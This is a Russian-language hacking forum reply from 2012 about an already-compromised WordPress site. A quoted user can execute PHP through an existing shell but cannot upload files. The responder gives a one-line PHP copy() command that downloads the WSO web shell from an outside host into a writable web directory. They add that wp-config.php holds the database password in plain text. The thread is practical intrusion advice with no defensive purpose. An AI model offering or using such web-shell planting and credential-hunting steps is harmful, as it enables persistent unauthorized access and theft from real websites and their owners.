14.01.2012, 18:51
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от faza02
пахекал сайт, стал искать админку
нашел пару подозрительных файлов, открываю — шелл
попытался с него залиться, редактировать файлы, создавать папки — никак
могу только просматривать
есть вомзможность выполнять произвольный php код, но это мало чем помогло, загрузка файлов не работает
sm off
права есть
drwxrwxrwx на все папки
поискал юзера и пасс от бд
он ведь в wp-config.php находится?
не расшифровал
ну собстенно вопрос в том, что можно сделать?
Еслить можно выполнять код + папки на запись, то какая проблема?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://site.ltd/wso.txt"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/home/www/123.php"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
P.S. В wp-config.php пасс хранится в открытом виде.
|
|
|